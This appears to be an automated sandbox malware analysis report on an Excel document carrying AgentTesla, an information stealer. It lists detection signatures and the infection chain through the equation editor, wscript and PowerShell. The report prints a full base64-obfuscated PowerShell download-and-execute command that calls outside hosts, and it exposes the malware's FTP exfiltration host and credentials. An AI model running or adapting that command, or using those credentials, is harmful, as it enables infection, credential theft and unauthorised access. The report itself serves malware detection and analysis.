Edit tour
Windows
Analysis Report
Comprobante de pago.xlam.xlsx
Overview
General Information
| Sample name: | Comprobante de pago.xlam.xlsx |
| Analysis ID: | 1566138 |
| MD5: | ad8b92e44bd2d3703c895e34ca4e2865 |
| SHA1: | 6503ab3f0a7adbeb16b389d29ed2a2c6f742bf5a |
| SHA256: | 4d6ddf9237e8dce54263bfe1df769f0c2fb6941713b7959decc1a7822e6e8e9b |
| Tags: | xlsxuser-lowmal3 |
| Infos: |   |
 | |
Detection
AgentTesla
| Score: | 100 |
| Range: | 0 - 100 |
| Whitelisted: | false |
| Confidence: | 100% |
Signatures
Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected Powershell download and execute
Check if machine is in data center or colocation facility
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Document exploit detected (process start blacklist hit)
Injects a PE file into a foreign processes
Installs new ROOT certificates
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Shellcode detected
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains functionality to download and execute PE files
Contains functionality to download and launch executables
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Suspicious DNS Query for IP Lookup Service APIs
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores large binary data to the registry
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match
Classification
- System is w7x64
EXCEL.EXE (PID: 3364 cmdline: "C:\Progra m Files\Mi crosoft Of fice\Offic e14\EXCEL. EXE" /auto mation -Em bedding MD5: D53B85E21886D2AF9815C377537BCAC3) 
EQNEDT32.EXE (PID: 3580 cmdline: "C:\Progra m Files\Co mmon Files \Microsoft Shared\EQ UATION\EQN EDT32.EXE" -Embeddin g MD5: A87236E214F6D42A65F5DEDAC816AEC8) 
wscript.exe (PID: 3736 cmdline: "C:\Window s\System32 \WScript.e xe" "C:\Us ers\user\A ppData\Roa ming\menta llanguagef atalmemtal lliz.vbs" MD5: 979D74799EA6C8B8167869A68DF5204A) 
powershell.exe (PID: 3784 cmdline: "C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" $elar = 'J GZsZWltb3N vID0gJ2h0d HBzOi8vMTA xNi5maWxlb WFpbC5jb20 vYXBpL2Zpb GUvZ2V0P2Z pbGVrZXk9S FRVR19FeXJ 1RFIwT0FaS DBISEp5ZXB VclhTdkZfa TZqOGJ3ZVR lV0JDdTE5e GNialFONVR rc2E0T0cwT XFjY3FXTkx sZyZwa192a WQ9ZTAxMDk 2MzhjOWJmY jk1NzE3MzI 3OTQzNTZhM WZmNmMgJzs kdW5pY2Vsd WxhciA9IE5 ldy1PYmplY 3QgU3lzdGV tLk5ldC5XZ WJDbGllbnQ 7JGNvcmNvd mFkbyA9ICR 1bmljZWx1b GFyLkRvd25 sb2FkRGF0Y SgkZmxlaW1 vc28pOyRuZ XRhbWVudGU gPSBbU3lzd GVtLlRleHQ uRW5jb2Rpb mddOjpVVEY 4LkdldFN0c mluZygkY29 yY292YWRvK TskYmVpamF mbG9yID0gJ zw8QkFTRTY 0X1NUQVJUP j4nOyRleHB sb3NpciA9I Cc8PEJBU0U 2NF9FTkQ+P ic7JGZhYmF nZWxsYSA9I CRuZXRhbWV udGUuSW5kZ XhPZigkYmV pamFmbG9yK TskbXVuaGE gPSAkbmV0Y W1lbnRlLkl uZGV4T2YoJ GV4cGxvc2l yKTskZmFiY WdlbGxhIC1 nZSAwIC1hb mQgJG11bmh hIC1ndCAkZ mFiYWdlbGx hOyRmYWJhZ 2VsbGEgKz0 gJGJlaWphZ mxvci5MZW5 ndGg7JGZvb G9zYSA9ICR tdW5oYSAtI CRmYWJhZ2V sbGE7JGdlc m1pY2lkYSA 9ICRuZXRhb WVudGUuU3V ic3RyaW5nK CRmYWJhZ2V sbGEsICRmb 2xvc2EpOyR wZW5oYXNjb 3NvID0gLWp vaW4gKCRnZ XJtaWNpZGE uVG9DaGFyQ XJyYXkoKSB 8IEZvckVhY 2gtT2JqZWN 0IHsgJF8gf SlbLTEuLi0 oJGdlcm1pY 2lkYS5MZW5 ndGgpXTskZ GV0cmFjdGl 2byA9IFtTe XN0ZW0uQ29 udmVydF06O kZyb21CYXN lNjRTdHJpb mcoJHBlbmh hc2Nvc28pO yRjb3Jlb2d yYWZpYSA9I FtTeXN0ZW0 uUmVmbGVjd Glvbi5Bc3N lbWJseV06O kxvYWQoJGR ldHJhY3Rpd m8pOyRib3R pbSA9IFtkb mxpYi5JTy5 Ib21lXS5HZ XRNZXRob2Q oJ1ZBSScpO yRib3RpbS5 JbnZva2UoJ G51bGwsIEA oJ3R4dC5zc 3NzZ2liYW1 tZS81MDEuN jguMTIxLjc 4Ly86cHR0a CcsICckcGl wb2NvJywgJ yRwaXBvY28 nLCAnJHBpc G9jbycsICd JbnN0YWxsV XRpbCcsICc kcGlwb2NvJ ywgJyRwaXB vY28nLCckc Glwb2NvJyw nJHBpcG9jb ycsJyRwaXB vY28nLCckc Glwb2NvJyw nJHBpcG9jb ycsJzEnLCc kcGlwb2NvJ ykpOw==';$ alteastro = [System. Text.Encod ing]::UTF8 .GetString ([System.C onvert]::F romBase64S tring($ela r));Invoke -Expressio n $alteast ro MD5: EB32C070E658937AA9FA9F3AE629B2B8) 
InstallUtil.exe (PID: 3976 cmdline: "C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Ins tallUtil.e xe" MD5: AF862061889F5B9B956E9469DCDAE773)
- cleanup
| Name | Description | Attribution | Blogpost URLs | Link |
|---|---|---|---|---|
| Agent Tesla, AgentTesla | A .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel. |
{"Exfil Mode": "FTP", "Host": "ftp://ftp.horeca-bucuresti.ro", "Username": "biggiemma@horeca-bucuresti.ro", "Password": "e)rWKbKP8~mO"}| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| INDICATOR_XML_LegacyDrawing_AutoLoad_Document | detects AutoLoad documents using LegacyDrawing | ditekSHen |
|
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| Click to see the 6 entries | ||||
| Source | Rule | Description | Author | Strings |
|---|---|---|---|---|
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| JoeSecurity_AgentTesla_1 | Yara detected AgentTesla | Joe Security | ||
| INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID | Detects executables referencing Windows vault credential objects. Observed in infostealers | ditekSHen |
| |
| MALWARE_Win_AgentTeslaV2 | AgenetTesla Type 2 Keylogger payload | ditekSHen |
| |
| JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security | ||
| Click to see the 9 entries | ||||
Exploits |   |
|---|
| Source: | Author: Joe Security: | ||
| Source: | Author: Joe Security: | ||
System Summary | |
|---|
| Source: | Author: Florian Roth (Nextron Systems): | ||